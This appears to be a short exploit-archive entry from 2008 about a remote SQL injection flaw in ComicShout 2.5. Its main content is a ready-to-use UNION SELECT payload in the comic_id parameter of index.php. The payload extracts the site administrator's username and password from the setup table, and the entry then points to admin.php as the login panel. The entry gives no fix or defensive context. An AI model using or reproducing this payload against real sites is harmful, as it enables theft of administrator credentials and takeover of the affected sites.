id: 3054
date: 05/19/2008
title: ComicShout 2.5 (index.php comic_id) Remote SQL Injection Vulnerability
author: Niiub
cves: 

======================================================================
ComicShout 2.5 (index.php comic_id) Remote SQL Injection Vulnerability
======================================================================



##########################################################

Exploit:

/index.php?comic_id=-1+UNION+SELECT+1,2,3,concat(site_admin,char(58),site_pass),5,6+FROM+setup/*


Admin PA:

admin.php

###########################################################




#  0day.today [2023-03-27]  #